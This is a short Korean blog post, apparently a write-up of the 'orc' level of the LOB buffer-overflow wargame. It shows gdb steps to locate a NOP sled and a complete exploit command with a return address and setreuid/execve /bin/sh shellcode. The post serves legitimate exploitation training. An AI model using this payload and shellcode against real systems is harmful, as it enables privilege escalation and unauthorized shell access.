Wargame/CTF(Capture The Flag)

LOB orc

𝓛𝓾𝓬𝓮𝓽𝓮_𝓢𝓽𝓮𝓵𝓵𝓪 2015. 9. 15.
728x90
반응형


cp명령어 같은 건 무시하고 다시 접속을 하여 문제를 풀면 

orc.c를 열어보면 buffer가 40이고 리턴값이 \xbf가 꼭 들어가야 한다고 나온다.


gdb를 명령어를 이용하여 메인에 브레이크포인트를 걸고 r $(python -c 'print "\x90"*100을 입력하여 esp값을 바꾸었다.

그후 x/100 $esp로 값을 확인하면 90909090들어가 있는 주소를 볼수 있다.




payload를 작성해보면  ./orc $(python -c 'print "\x90"*40+"AAAA(dummy)"+"\xdb\xfb\xff\xbf(ret 주소값)"+"\x90"*180+"\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"')




728x90
반응형

'Wargame > CTF(Capture The Flag)' 카테고리의 다른 글

LOB darklf  (0) 2015.09.15
LOB wolfman  (0) 2015.09.15
LOB goblin  (0) 2015.09.15
LOB gremlin  (0) 2015.09.14
LOB gate  (0) 2015.09.14

태그

, , ,

댓글0

💲 추천 글